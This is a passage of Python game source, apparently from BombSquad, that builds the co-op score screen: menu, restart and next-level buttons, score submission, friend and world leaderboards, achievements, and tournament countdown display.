ba.getsound('cymbal')\n\n # These get used in UI bits so need to load them in the UI context.\n with ba.Context('ui'):\n self._replay_icon_texture = ba.gettexture('replayIcon')\n self._menu_icon_texture = ba.gettexture('menuIcon')\n self._next_level_icon_texture = ba.gettexture('nextLevelIcon')\n\n self._campaign: ba.Campaign = settings['campaign']\n\n self._have_achievements = bool(\n get_achievements_for_coop_level(self._campaign.name + ':' +\n settings['level']))\n\n self._account_type = (_ba.get_account_type() if\n _ba.get_account_state() == 'signed_in' else None)\n\n self._game_service_icon_color: Optional[Sequence[float]]\n self._game_service_achievements_texture: Optional[ba.Texture]\n self._game_service_leaderboards_texture: Optional[ba.Texture]\n\n with ba.Context('ui'):\n if self._account_type == 'Game Center':\n self._game_service_icon_color = (1.0, 1.0, 1.0)\n icon = ba.gettexture('gameCenterIcon')\n self._game_service_achievements_texture = icon\n self._game_service_leaderboards_texture = icon\n self._account_has_achievements = True\n elif self._account_type == 'Game Circle':\n icon = ba.gettexture('gameCircleIcon')\n self._game_service_icon_color = (1, 1, 1)\n self._game_service_achievements_texture = icon\n self._game_service_leaderboards_texture = icon\n self._account_has_achievements = True\n elif self._account_type == 'Google Play':\n self._game_service_icon_color = (0.8, 1.0, 0.6)\n self._game_service_achievements_texture = (\n ba.gettexture('googlePlayAchievementsIcon'))\n self._game_service_leaderboards_texture = (\n ba.gettexture('googlePlayLeaderboardsIcon'))\n self._account_has_achievements = True\n else:\n self._game_service_icon_color = None\n self._game_service_achievements_texture = None\n self._game_service_leaderboards_texture = None\n self._account_has_achievements = False\n\n self._cashregistersound = ba.getsound('cashRegister')\n self._gun_cocking_sound = ba.getsound('gunCocking')\n self._dingsound = ba.getsound('ding')\n self._score_link: Optional[str] = None\n self._root_ui: Optional[ba.Widget] = None\n self._background: Optional[ba.Actor] = None\n self._old_best_rank = 0.0\n self._game_name_str: Optional[str] = None\n self._game_config_str: Optional[str] = None\n\n # Ui bits.\n self._corner_button_offs: Optional[Tuple[float, float]] = None\n self._league_rank_button: Optional[LeagueRankButton] = None\n self._store_button_instance: Optional[StoreButton] = None\n self._restart_button: Optional[ba.Widget] = None\n self._update_corner_button_positions_timer: Optional[ba.Timer] = None\n self._next_level_error: Optional[ba.Actor] = None\n\n # Score/gameplay bits.\n self._was_complete: Optional[bool] = None\n self._is_complete: Optional[bool] = None\n self._newly_complete: Optional[bool] = None\n self._is_more_levels: Optional[bool] = None\n self._next_level_name: Optional[str] = None\n self._show_friend_scores: Optional[bool] = None\n self._show_info: Optional[Dict[str, Any]] = None\n self._name_str: Optional[str] = None\n self._friends_loading_status: Optional[ba.Actor] = None\n self._score_loading_status: Optional[ba.Actor] = None\n self._tournament_time_remaining: Optional[float] = None\n self._tournament_time_remaining_text: Optional[Text] = None\n self._tournament_time_remaining_text_timer: Optional[ba.Timer] = None\n\n self._playerinfos: List[ba.PlayerInfo] = settings['playerinfos']\n assert isinstance(self._playerinfos, list)\n assert (isinstance(i, ba.PlayerInfo) for i in self._playerinfos)\n\n self._score: Optional[int] = settings['score']\n assert isinstance(self._score, (int, type(None)))\n\n self._fail_message: Optional[ba.Lstr] = settings['fail_message']\n assert isinstance(self._fail_message, (ba.Lstr, type(None)))\n\n self._begin_time: Optional[float] = None\n\n self._score_order: str\n if 'score_order' in settings:\n if not settings['score_order'] in ['increasing', 'decreasing']:\n raise ValueError('Invalid score order: ' +\n settings['score_order'])\n self._score_order = settings['score_order']\n else:\n self._score_order = 'increasing'\n assert isinstance(self._score_order, str)\n\n self._score_type: str\n if 'score_type' in settings:\n if not settings['score_type'] in ['points', 'time']:\n raise ValueError('Invalid score type: ' +\n settings['score_type'])\n self._score_type = settings['score_type']\n else:\n self._score_type = 'points'\n assert isinstance(self._score_type, str)\n\n self._level_name: str = settings['level']\n assert isinstance(self._level_name, str)\n\n self._game_name_str = self._campaign.name + ':' + self._level_name\n self._game_config_str = str(len(\n self._playerinfos)) + 'p' + self._campaign.getlevel(\n self._level_name).get_score_version_string().replace(' ', '_')\n\n # If game-center/etc scores are available we show our friends'\n # scores. Otherwise we show our local high scores.\n self._show_friend_scores = _ba.game_service_has_leaderboard(\n self._game_name_str, self._game_config_str)\n\n try:\n self._old_best_rank = self._campaign.getlevel(\n self._level_name).rating\n except Exception:\n self._old_best_rank = 0.0\n\n self._victory: bool = settings['outcome'] == 'victory'\n\n def __del__(self) -> None:\n super().__del__()\n\n # If our UI is still up, kill it.\n if self._root_ui:\n with ba.Context('ui'):\n ba.containerwidget(edit=self._root_ui, transition='out_left')\n\n def on_transition_in(self) -> None:\n from bastd.actor import background # FIXME NO BSSTD\n ba.set_analytics_screen('Coop Score Screen')\n super().on_transition_in()\n self._background = background.Background(fade_time=0.45,\n start_faded=False,\n show_logo=True)\n\n def _ui_menu(self) -> None:\n from bastd.ui import specialoffer\n if specialoffer.show_offer():\n return\n ba.containerwidget(edit=self._root_ui, transition='out_left')\n with ba.Context(self):\n ba.timer(0.1, ba.Call(ba.WeakCall(self.session.end)))\n\n def _ui_restart(self) -> None:\n from bastd.ui.tournamententry import TournamentEntryWindow\n from bastd.ui import specialoffer\n if specialoffer.show_offer():\n return\n\n # If we're in a tournament and it looks like there's no time left,\n # disallow.\n if self.session.tournament_id is not None:\n if self._tournament_time_remaining is None:\n ba.screenmessage(\n ba.Lstr(resource='tournamentCheckingStateText'),\n color=(1, 0, 0))\n ba.playsound(ba.getsound('error'))\n return\n if self._tournament_time_remaining <= 0:\n ba.screenmessage(ba.Lstr(resource='tournamentEndedText'),\n color=(1, 0, 0))\n ba.playsound(ba.getsound('error'))\n return\n\n # If there are currently fewer players than our session min,\n # don't allow.\n if len(self.players) < self.session.min_players:\n ba.screenmessage(ba.Lstr(resource='notEnoughPlayersRemainingText'),\n color=(1, 0, 0))\n ba.playsound(ba.getsound('error'))\n return\n\n self._campaign.set_selected_level(self._level_name)\n\n # If this is a tournament, go back to the tournament-entry UI\n # otherwise just hop back in.\n tournament_id = self.session.tournament_id\n if tournament_id is not None:\n assert self._restart_button is not None\n TournamentEntryWindow(\n tournament_id=tournament_id,\n tournament_activity=self,\n position=self._restart_button.get_screen_space_center())\n else:\n ba.containerwidget(edit=self._root_ui, transition='out_left')\n self.can_show_ad_on_death = True\n with ba.Context(self):\n self.end({'outcome': 'restart'})\n\n def _ui_next(self) -> None:\n from bastd.ui.specialoffer import show_offer\n if show_offer():\n return\n\n # If we didn't just complete this level but are choosing to play the\n # next one, set it as current (this won't happen otherwise).\n if (self._is_complete and self._is_more_levels\n and not self._newly_complete):\n assert self._next_level_name is not None\n self._campaign.set_selected_level(self._next_level_name)\n ba.containerwidget(edit=self._root_ui, transition='out_left')\n with ba.Context(self):\n self.end({'outcome': 'next_level'})\n\n def _ui_gc(self) -> None:\n _ba.show_online_score_ui('leaderboard',\n game=self._game_name_str,\n game_version=self._game_config_str)\n\n def _ui_show_achievements(self) -> None:\n _ba.show_online_score_ui('achievements')\n\n def _ui_worlds_best(self) -> None:\n if self._score_link is None:\n ba.playsound(ba.getsound('error'))\n ba.screenmessage(ba.Lstr(resource='scoreListUnavailableText'),\n color=(1, 0.5, 0))\n else:\n ba.open_url(self._score_link)\n\n def _ui_error(self) -> None:\n with ba.Context(self):\n self._next_level_error = Text(\n ba.Lstr(resource='completeThisLevelToProceedText'),\n flash=True,\n maxwidth=360,\n scale=0.54,\n h_align=Text.HAlign.CENTER,\n color=(0.5, 0.7, 0.5, 1),\n position=(300, -235))\n ba.playsound(ba.getsound('error'))\n ba.timer(\n 2.0,\n ba.WeakCall(self._next_level_error.handlemessage,\n ba.DieMessage()))\n\n def _should_show_worlds_best_button(self) -> bool:\n # Link is too complicated to display with no browser.\n return ba.is_browser_likely_available()\n\n def request_ui(self) -> None:\n \"\"\"Set up a callback to show our UI at the next opportune time.\"\"\"\n # We don't want to just show our UI in case the user already has the\n # main menu up, so instead we add a callback for when the menu\n # closes; if we're still alive, we'll come up then.\n # If there's no main menu this gets called immediately.\n ba.app.add_main_menu_close_callback(ba.WeakCall(self.show_ui))\n\n def show_ui(self) -> None:\n \"\"\"Show the UI for restarting, playing the next Level, etc.\"\"\"\n # pylint: disable=too-many-locals\n from bastd.ui.store.button import StoreButton\n from bastd.ui.league.rankbutton import LeagueRankButton\n\n delay = 0.7 if (self._score is not None) else 0.0\n\n # If there's no players left in the game, lets not show the UI\n # (that would allow restarting the game with zero players, etc).\n if not self.players:\n return\n\n rootc = self._root_ui = ba.containerwidget(size=(0, 0),\n transition='in_right')\n\n h_offs = 7.0\n v_offs = -280.0\n\n # We wanna prevent controllers users from popping up browsers\n # or game-center widgets in cases where they can't easily get back\n # to the game (like on mac).\n can_select_extra_buttons = ba.app.platform == 'android'\n\n _ba.set_ui_input_device(None) # Menu is up for grabs.\n\n if self._show_friend_scores:\n ba.buttonwidget(parent=rootc,\n color=(0.45, 0.4, 0.5),\n position=(h_offs - 520, v_offs + 480),\n size=(300, 60),\n label=ba.Lstr(resource='topFriendsText'),\n on_activate_call=ba.WeakCall(self._ui_gc),\n transition_delay=delay + 0.5,\n icon=self._game_service_leaderboards_texture,\n icon_color=self._game_service_icon_color,\n autoselect=True,\n selectable=can_select_extra_buttons)\n\n if self._have_achievements and self._account_has_achievements:\n ba.buttonwidget(parent=rootc,\n color=(0.45, 0.4, 0.5),\n position=(h_offs - 520, v_offs + 450 - 235 + 40),\n size=(300, 60),\n label=ba.Lstr(resource='achievementsText'),\n on_activate_call=ba.WeakCall(\n self._ui_show_achievements),\n transition_delay=delay + 1.5,\n icon=self._game_service_achievements_texture,\n icon_color=self._game_service_icon_color,\n autoselect=True,\n selectable=can_select_extra_buttons)\n\n if self._should_show_worlds_best_button():\n ba.buttonwidget(\n parent=rootc,\n color=(0.45, 0.4, 0.5),\n position=(160, v_offs + 480),\n size=(350, 62),\n label=ba.Lstr(resource='tournamentStandingsText')\n if self.session.tournament_id is not None else ba.Lstr(\n resource='worldsBestScoresText') if self._score_type\n == 'points' else ba.Lstr(resource='worldsBestTimesText'),\n autoselect=True,\n on_activate_call=ba.WeakCall(self._ui_worlds_best),\n transition_delay=delay + 1.9,\n selectable=can_select_extra_buttons)\n else:\n pass\n\n show_next_button = self._is_more_levels and not ba.app.kiosk_mode\n\n if not show_next_button:\n h_offs += 70\n\n menu_button = ba.buttonwidget(parent=rootc,\n autoselect=True,\n position=(h_offs - 130 - 60, v_offs),\n size=(110, 85),\n label='',\n on_activate_call=ba.WeakCall(\n self._ui_menu))\n ba.imagewidget(parent=rootc,\n draw_controller=menu_button,\n position=(h_offs - 130 - 60 + 22, v_offs + 14),\n size=(60, 60),\n texture=self._menu_icon_texture,\n opacity=0.8)\n self._restart_button = restart_button = ba.buttonwidget(\n parent=rootc,\n autoselect=True,\n position=(h_offs - 60, v_offs),\n size=(110, 85),\n label='',\n on_activate_call=ba.WeakCall(self._ui_restart))\n ba.imagewidget(parent=rootc,\n draw_controller=restart_button,\n position=(h_offs - 60 + 19, v_offs + 7),\n size=(70, 70),\n texture=self._replay_icon_texture,\n opacity=0.8)\n\n next_button: Optional[ba.Widget] = None\n\n # Our 'next' button is disabled if we haven't unlocked the next\n # level yet and invisible if there is none.\n if show_next_button:\n if self._is_complete:\n call = ba.WeakCall(self._ui_next)\n button_sound = True\n image_opacity = 0.8\n color = None\n else:\n call = ba.WeakCall(self._ui_error)\n button_sound = False\n image_opacity = 0.2\n color = (0.3, 0.3, 0.3)\n next_button = ba.buttonwidget(parent=rootc,\n autoselect=True,\n position=(h_offs + 130 - 60, v_offs),\n size=(110, 85),\n label='',\n on_activate_call=call,\n color=color,\n enable_sound=button_sound)\n ba.imagewidget(parent=rootc,\n draw_controller=next_button,\n position=(h_offs + 130 - 60 + 12, v_offs + 5),\n size=(80, 80),\n texture=self._next_level_icon_texture,\n opacity=image_opacity)\n\n x_offs_extra = 0 if show_next_button else -100\n self._corner_button_offs = (h_offs + 300.0 + 100.0 + x_offs_extra,\n v_offs + 560.0)\n\n if ba.app.kiosk_mode:\n self._league_rank_button = None\n self._store_button_instance = None\n else:\n self._league_rank_button = LeagueRankButton(\n parent=rootc,\n position=(h_offs + 300 + 100 + x_offs_extra, v_offs + 560),\n size=(100, 60),\n scale=0.9,\n color=(0.4, 0.4, 0.9),\n textcolor=(0.9, 0.9, 2.0),\n transition_delay=0.0,\n smooth_update_delay=5.0)\n self._store_button_instance = StoreButton(\n parent=rootc,\n position=(h_offs + 400 + 100 + x_offs_extra, v_offs + 560),\n show_tickets=True,\n sale_scale=0.85,\n size=(100, 60),\n scale=0.9,\n button_type='square',\n color=(0.35, 0.25, 0.45),\n textcolor=(0.9, 0.7, 1.0),\n transition_delay=0.0)\n\n ba.containerwidget(edit=rootc,\n selected_child=next_button if\n (self._newly_complete and self._victory\n and show_next_button) else restart_button,\n on_cancel_call=menu_button.activate)\n\n self._update_corner_button_positions()\n self._update_corner_button_positions_timer = ba.Timer(\n 1.0,\n ba.WeakCall(self._update_corner_button_positions),\n repeat=True,\n timetype=ba.TimeType.REAL)\n\n def _update_corner_button_positions(self) -> None:\n offs = -55 if _ba.is_party_icon_visible() else 0\n assert self._corner_button_offs is not None\n pos_x = self._corner_button_offs[0] + offs\n pos_y = self._corner_button_offs[1]\n if self._league_rank_button is not None:\n self._league_rank_button.set_position((pos_x, pos_y))\n if self._store_button_instance is not None:\n self._store_button_instance.set_position((pos_x + 100, pos_y))\n\n def on_begin(self) -> None:\n # FIXME: Clean this up.\n # pylint: disable=too-many-statements\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-locals\n super().on_begin()\n\n self._begin_time = ba.time()\n\n # Calc whether the level is complete and other stuff.\n levels = self._campaign.levels\n level = self._campaign.getlevel(self._level_name)\n self._was_complete = level.complete\n self._is_complete = (self._was_complete or self._victory)\n self._newly_complete = (self._is_complete and not self._was_complete)\n self._is_more_levels = ((level.index < len(levels) - 1)\n and self._campaign.sequential)\n\n # Any time we complete a level, set the next one as unlocked.\n if self._is_complete and self._is_more_levels:\n _ba.add_transaction({\n 'type': 'COMPLETE_LEVEL',\n 'campaign': self._campaign.name,\n 'level': self._level_name\n })\n self._next_level_name = levels[level.index + 1].name\n\n # If this is the first time we completed it, set the next one\n # as current.\n if self._newly_complete:\n cfg = ba.app.config\n cfg['Selected Coop Game'] = (self._campaign.name + ':' +\n self._next_level_name)\n cfg.commit()\n self._campaign.set_selected_level(self._next_level_name)\n\n ba.timer(1.0, ba.WeakCall(self.request_ui))\n\n if (self._is_complete and self._victory and self._is_more_levels\n and not ba.app.kiosk_mode):\n Text(ba.Lstr(value='${A}:\\n',\n subs=[('${A}', ba.Lstr(resource='levelUnlockedText'))\n ]) if self._newly_complete else\n ba.Lstr(value='${A}:\\n',\n subs=[('${A}', ba.Lstr(resource='nextLevelText'))]),\n transition=Text.Transition.IN_RIGHT,\n transition_delay=5.2,\n flash=self._newly_complete,\n scale=0.54,\n h_align=Text.HAlign.CENTER,\n maxwidth=270,\n color=(0.5, 0.7, 0.5, 1),\n position=(270, -235)).autoretain()\n assert self._next_level_name is not None\n Text(ba.Lstr(translate=('coopLevelNames', self._next_level_name)),\n transition=Text.Transition.IN_RIGHT,\n transition_delay=5.2,\n flash=self._newly_complete,\n scale=0.7,\n h_align=Text.HAlign.CENTER,\n maxwidth=205,\n color=(0.5, 0.7, 0.5, 1),\n position=(270, -255)).autoretain()\n if self._newly_complete:\n ba.timer(5.2, ba.Call(ba.playsound, self._cashregistersound))\n ba.timer(5.2, ba.Call(ba.playsound, self._dingsound))\n\n offs_x = -195\n if len(self._playerinfos) > 1:\n pstr = ba.Lstr(value='- ${A} -',\n subs=[('${A}',\n ba.Lstr(resource='multiPlayerCountText',\n subs=[('${COUNT}',\n str(len(self._playerinfos)))\n ]))])\n else:\n pstr = ba.Lstr(value='- ${A} -',\n subs=[('${A}',\n ba.Lstr(resource='singlePlayerCountText'))])\n ZoomText(self._campaign.getlevel(self._level_name).displayname,\n maxwidth=800,\n flash=False,\n trail=False,\n color=(0.5, 1, 0.5, 1),\n h_align='center',\n scale=0.4,\n position=(0, 292),\n jitter=1.0).autoretain()\n Text(pstr,\n maxwidth=300,\n transition=Text.Transition.FADE_IN,\n scale=0.7,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n color=(0.5, 0.7, 0.5, 1),\n position=(0, 230)).autoretain()\n\n adisp = _ba.get_account_display_string()\n txt = Text(ba.Lstr(resource='waitingForHostText',\n subs=[('${HOST}', adisp)]),\n maxwidth=300,\n transition=Text.Transition.FADE_IN,\n transition_delay=8.0,\n scale=0.85,\n h_align=Text.HAlign.CENTER,\n v_align=Text.VAlign.CENTER,\n color=(1, 1, 0, 1),\n position=(0, -230)).autoretain()\n assert txt.node\n txt.node.client_only = True\n\n if self._score is not None:\n ba.timer(0.35,\n ba.Call(ba.playsound, self._score_display_sound_small))\n\n # Vestigial remain; this stuff should just be instance vars.\n self._show_info = {}\n\n if self._score is not None:\n ba.timer(0.8, ba.WeakCall(self._show_score_val, offs_x))\n else:\n ba.pushcall(ba.WeakCall(self._show_fail))\n\n self._name_str = name_str = ', '.join(\n [p.name for p in self._playerinfos])\n\n if self._show_friend_scores:\n self._friends_loading_status = Text(\n ba.Lstr(value='${A}...',\n subs=[('${A}', ba.Lstr(resource='loadingText'))]),\n position=(-405, 150 + 30),\n color=(1, 1, 1, 0.4),\n transition=Text.Transition.FADE_IN,\n scale=0.7,\n transition_delay=2.0)\n self._score_loading_status = Text(ba.Lstr(\n value='${A}...', subs=[('${A}', ba.Lstr(resource='loadingText'))]),\n position=(280, 150 + 30),\n color=(1, 1, 1, 0.4),\n transition=Text.Transition.FADE_IN,\n scale=0.7,\n transition_delay=2.0)\n\n if self._score is not None:\n ba.timer(0.4, ba.WeakCall(self._play_drumroll))\n\n # Add us to high scores, filter, and store.\n our_high_scores_all = self._campaign.getlevel(\n self._level_name).get_high_scores()\n\n our_high_scores = our_high_scores_all.setdefault(\n str(len(self._playerinfos)) + ' Player', [])\n\n if self._score is not None:\n our_score: Optional[list] = [\n self._score, {\n 'players': [{\n 'name': p.name,\n 'character': p.character\n } for p in self._playerinfos]\n }\n ]\n our_high_scores.append(our_score)\n else:\n our_score = None\n\n try:\n our_high_scores.sort(reverse=self._score_order == 'increasing',\n key=lambda x: x[0])\n except Exception:\n ba.print_exception('Error sorting scores.')\n print(f'our_high_scores: {our_high_scores}')\n\n del our_high_scores[10:]\n\n if self._score is not None:\n sver = (self._campaign.getlevel(\n self._level_name).get_score_version_string())\n _ba.add_transaction({\n 'type': 'SET_LEVEL_LOCAL_HIGH_SCORES',\n 'campaign': self._campaign.name,\n 'level': self._level_name,\n 'scoreVersion': sver,\n 'scores': our_high_scores_all\n })\n if _ba.get_account_state() != 'signed_in':\n # We expect this only in kiosk mode; complain otherwise.\n if not ba.app.kiosk_mode:\n print('got not-signed-in at score-submit; unexpected')\n if self._show_friend_scores:\n ba.pushcall(ba.WeakCall(self._got_friend_score_results, None))\n ba.pushcall(ba.WeakCall(self._got_score_results, None))\n else:\n assert self._game_name_str is not None\n assert self._game_config_str is not None\n _ba.submit_score(self._game_name_str,\n self._game_config_str,\n name_str,\n self._score,\n ba.WeakCall(self._got_score_results),\n ba.WeakCall(self._got_friend_score_results)\n if self._show_friend_scores else None,\n order=self._score_order,\n tournament_id=self.session.tournament_id,\n score_type=self._score_type,\n campaign=self._campaign.name,\n level=self._level_name)\n\n # Apply the transactions we've been adding locally.\n _ba.run_transactions()\n\n # If we're not doing the world's-best button, just show a title\n # instead.\n ts_height = 300\n ts_h_offs = 210\n v_offs = 40\n txt = Text(ba.Lstr(resource='tournamentStandingsText')\n if self.session.tournament_id is not None else ba.Lstr(\n resource='worldsBestScoresText') if self._score_type\n == 'points' else ba.Lstr(resource='worldsBestTimesText'),\n maxwidth=210,\n position=(ts_h_offs - 10, ts_height / 2 + 25 + v_offs + 20),\n transition=Text.Transition.IN_LEFT,\n v_align=Text.VAlign.CENTER,\n scale=1.2,\n transition_delay=2.2).autoretain()\n\n # If we've got a button on the server, only show this on clients.\n if self._should_show_worlds_best_button():\n assert txt.node\n txt.node.client_only = True\n\n # If we have no friend scores, display local best scores.\n if self._show_friend_scores:\n\n # Host has a button, so we need client-only text.\n ts_height = 300\n ts_h_offs = -480\n v_offs = 40\n txt = Text(ba.Lstr(resource='topFriendsText'),\n maxwidth=210,\n position=(ts_h_offs - 10,\n ts_height / 2 + 25 + v_offs + 20),\n transition=Text.Transition.IN_RIGHT,\n v_align=Text.VAlign.CENTER,\n scale=1.2,\n transition_delay=1.8).autoretain()\n assert txt.node\n txt.node.client_only = True\n else:\n\n ts_height = 300\n ts_h_offs = -480\n v_offs = 40\n Text(ba.Lstr(resource='yourBestScoresText') if self._score_type\n == 'points' else ba.Lstr(resource='yourBestTimesText'),\n maxwidth=210,\n position=(ts_h_offs - 10, ts_height / 2 + 25 + v_offs + 20),\n transition=Text.Transition.IN_RIGHT,\n v_align=Text.VAlign.CENTER,\n scale=1.2,\n transition_delay=1.8).autoretain()\n\n display_scores = list(our_high_scores)\n display_count = 5\n\n while len(display_scores) < display_count:\n display_scores.append((0, None))\n\n showed_ours = False\n h_offs_extra = 85 if self._score_type == 'points' else 130\n v_offs_extra = 20\n v_offs_names = 0\n scale = 1.0\n p_count = len(self._playerinfos)\n h_offs_extra -= 75\n if p_count > 1:\n h_offs_extra -= 20\n if p_count == 2:\n scale = 0.9\n elif p_count == 3:\n scale = 0.65\n elif p_count == 4:\n scale = 0.5\n times: List[Tuple[float, float]] = []\n for i in range(display_count):\n times.insert(random.randrange(0,\n len(times) + 1),\n (1.9 + i * 0.05, 2.3 + i * 0.05))\n for i in range(display_count):\n try:\n if display_scores[i][1] is None:\n name_str = '-'\n else:\n name_str = ', '.join([\n p['name'] for p in display_scores[i][1]['players']\n ])\n except Exception:\n ba.print_exception(\n f'Error calcing name_str for {display_scores}')\n name_str = '-'\n if display_scores[i] == our_score and not showed_ours:\n flash = True\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = 3.7\n tdelay2 = 3.7\n showed_ours = True\n else:\n flash = False\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = times[i][0]\n tdelay2 = times[i][1]\n Text(str(display_scores[i][0]) if self._score_type == 'points'\n else ba.timestring(display_scores[i][0] * 10,\n timeformat=ba.TimeFormat.MILLISECONDS,\n suppress_format_warning=True),\n position=(ts_h_offs + 20 + h_offs_extra,\n v_offs_extra + ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs + 11.0),\n h_align=Text.HAlign.RIGHT,\n v_align=Text.VAlign.CENTER,\n color=color0,\n flash=flash,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=tdelay1).autoretain()\n\n Text(ba.Lstr(value=name_str),\n position=(ts_h_offs + 35 + h_offs_extra,\n v_offs_extra + ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs_names + v_offs + 11.0),\n maxwidth=80.0 + 100.0 * len(self._playerinfos),\n v_align=Text.VAlign.CENTER,\n color=color1,\n flash=flash,\n scale=scale,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=tdelay2).autoretain()\n\n # Show achievements for this level.\n ts_height = -150\n ts_h_offs = -480\n v_offs = 40\n\n # Only make this if we don't have the button\n # (never want clients to see it so no need for client-only\n # version, etc).\n if self._have_achievements:\n if not self._account_has_achievements:\n Text(ba.Lstr(resource='achievementsText'),\n position=(ts_h_offs - 10,\n ts_height / 2 + 25 + v_offs + 3),\n maxwidth=210,\n host_only=True,\n transition=Text.Transition.IN_RIGHT,\n v_align=Text.VAlign.CENTER,\n scale=1.2,\n transition_delay=2.8).autoretain()\n\n assert self._game_name_str is not None\n achievements = get_achievements_for_coop_level(self._game_name_str)\n hval = -455\n vval = -100\n tdelay = 0.0\n for ach in achievements:\n ach.create_display(hval, vval + v_offs, 3.0 + tdelay)\n vval -= 55\n tdelay += 0.250\n\n ba.timer(5.0, ba.WeakCall(self._show_tips))\n\n def _play_drumroll(self) -> None:\n ba.NodeActor(\n ba.newnode('sound',\n attrs={\n 'sound': self.drum_roll_sound,\n 'positional': False,\n 'loop': False\n })).autoretain()\n\n def _got_friend_score_results(self, results: Optional[List[Any]]) -> None:\n\n # FIXME: tidy this up\n # pylint: disable=too-many-locals\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-statements\n # delay a bit if results come in too fast\n assert self._begin_time is not None\n base_delay = max(0, 1.9 - (ba.time() - self._begin_time))\n ts_height = 300\n ts_h_offs = -550\n v_offs = 30\n\n # Report in case of error.\n if results is None:\n self._friends_loading_status = Text(\n ba.Lstr(resource='friendScoresUnavailableText'),\n maxwidth=330,\n position=(-475, 150 + v_offs),\n color=(1, 1, 1, 0.4),\n transition=Text.Transition.FADE_IN,\n transition_delay=base_delay + 0.8,\n scale=0.7)\n return\n\n self._friends_loading_status = None\n\n # Ok, it looks like we aren't able to reliably get a just-submitted\n # result returned in the score list, so we need to look for our score\n # in this list and replace it if ours is better or add ours otherwise.\n if self._score is not None:\n our_score_entry = [self._score, 'Me', True]\n for score in results:\n if score[2]:\n if self._score_order == 'increasing':\n our_score_entry[0] = max(score[0], self._score)\n else:\n our_score_entry[0] = min(score[0], self._score)\n results.remove(score)\n break\n results.append(our_score_entry)\n results.sort(reverse=self._score_order == 'increasing',\n key=lambda x: x[0])\n\n # If we're not submitting our own score, we still want to change the\n # name of our own score to 'Me'.\n else:\n for score in results:\n if score[2]:\n score[1] = 'Me'\n break\n h_offs_extra = 80 if self._score_type == 'points' else 130\n v_offs_extra = 20\n v_offs_names = 0\n scale = 1.0\n\n # Make sure there's at least 5.\n while len(results) < 5:\n results.append([0, '-', False])\n results = results[:5]\n times: List[Tuple[float, float]] = []\n for i in range(len(results)):\n times.insert(random.randrange(0,\n len(times) + 1),\n (base_delay + i * 0.05, base_delay + 0.3 + i * 0.05))\n for i, tval in enumerate(results):\n score = int(tval[0])\n name_str = tval[1]\n is_me = tval[2]\n if is_me and score == self._score:\n flash = True\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = base_delay + 1.0\n tdelay2 = base_delay + 1.0\n else:\n flash = False\n if is_me:\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.9, 1.0, 0.9, 1.0)\n else:\n color0 = (0.6, 0.4, 0.1, 1.0)\n color1 = (0.6, 0.6, 0.6, 1.0)\n tdelay1 = times[i][0]\n tdelay2 = times[i][1]\n if name_str != '-':\n Text(str(score) if self._score_type == 'points' else\n ba.timestring(score * 10,\n timeformat=ba.TimeFormat.MILLISECONDS),\n position=(ts_h_offs + 20 + h_offs_extra,\n v_offs_extra + ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs + 11.0),\n h_align=Text.HAlign.RIGHT,\n v_align=Text.VAlign.CENTER,\n color=color0,\n flash=flash,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=tdelay1).autoretain()\n else:\n if is_me:\n print('Error: got empty name_str on score result:', tval)\n\n Text(ba.Lstr(value=name_str),\n position=(ts_h_offs + 35 + h_offs_extra,\n v_offs_extra + ts_height / 2 + -ts_height *\n (i + 1) / 10 + v_offs_names + v_offs + 11.0),\n color=color1,\n maxwidth=160.0,\n v_align=Text.VAlign.CENTER,\n flash=flash,\n scale=scale,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=tdelay2).autoretain()\n\n def _got_score_results(self, results: Optional[Dict[str, Any]]) -> None:\n\n # FIXME: tidy this up\n # pylint: disable=too-many-locals\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-statements\n\n # We need to manually run this in the context of our activity\n # and only if we aren't shutting down.\n # (really should make the submit_score call handle that stuff itself)\n if self.expired:\n return\n with ba.Context(self):\n # Delay a bit if results come in too fast.\n assert self._begin_time is not None\n base_delay = max(0, 2.7 - (ba.time() - self._begin_time))\n v_offs = 20\n if results is None:\n self._score_loading_status = Text(\n ba.Lstr(resource='worldScoresUnavailableText'),\n position=(230, 150 + v_offs),\n color=(1, 1, 1, 0.4),\n transition=Text.Transition.FADE_IN,\n transition_delay=base_delay + 0.3,\n scale=0.7)\n else:\n self._score_link = results['link']\n assert self._score_link is not None\n if not self._score_link.startswith('http://'):\n self._score_link = (_ba.get_master_server_address() + '/' +\n self._score_link)\n self._score_loading_status = None\n if 'tournamentSecondsRemaining' in results:\n secs_remaining = results['tournamentSecondsRemaining']\n assert isinstance(secs_remaining, int)\n self._tournament_time_remaining = secs_remaining\n self._tournament_time_remaining_text_timer = ba.Timer(\n 1.0,\n ba.WeakCall(\n self._update_tournament_time_remaining_text),\n repeat=True,\n timetype=ba.TimeType.BASE)\n\n assert self._show_info is not None\n self._show_info['results'] = results\n if results is not None:\n if results['tops'] != '':\n self._show_info['tops'] = results['tops']\n else:\n self._show_info['tops'] = []\n offs_x = -195\n available = (self._show_info['results'] is not None)\n if self._score is not None:\n ba.timer((1.5 + base_delay),\n ba.WeakCall(self._show_world_rank, offs_x),\n timetype=ba.TimeType.BASE)\n ts_h_offs = 200\n ts_height = 300\n\n # Show world tops.\n if available:\n\n # Show the number of games represented by this\n # list (except for in tournaments).\n if self.session.tournament_id is None:\n Text(ba.Lstr(resource='lastGamesText',\n subs=[\n ('${COUNT}',\n str(self._show_info['results']['total']))\n ]),\n position=(ts_h_offs - 35 + 95,\n ts_height / 2 + 6 + v_offs),\n color=(0.4, 0.4, 0.4, 1.0),\n scale=0.7,\n transition=Text.Transition.IN_RIGHT,\n transition_delay=base_delay + 0.3).autoretain()\n else:\n v_offs += 20\n\n h_offs_extra = 0\n v_offs_names = 0\n scale = 1.0\n p_count = 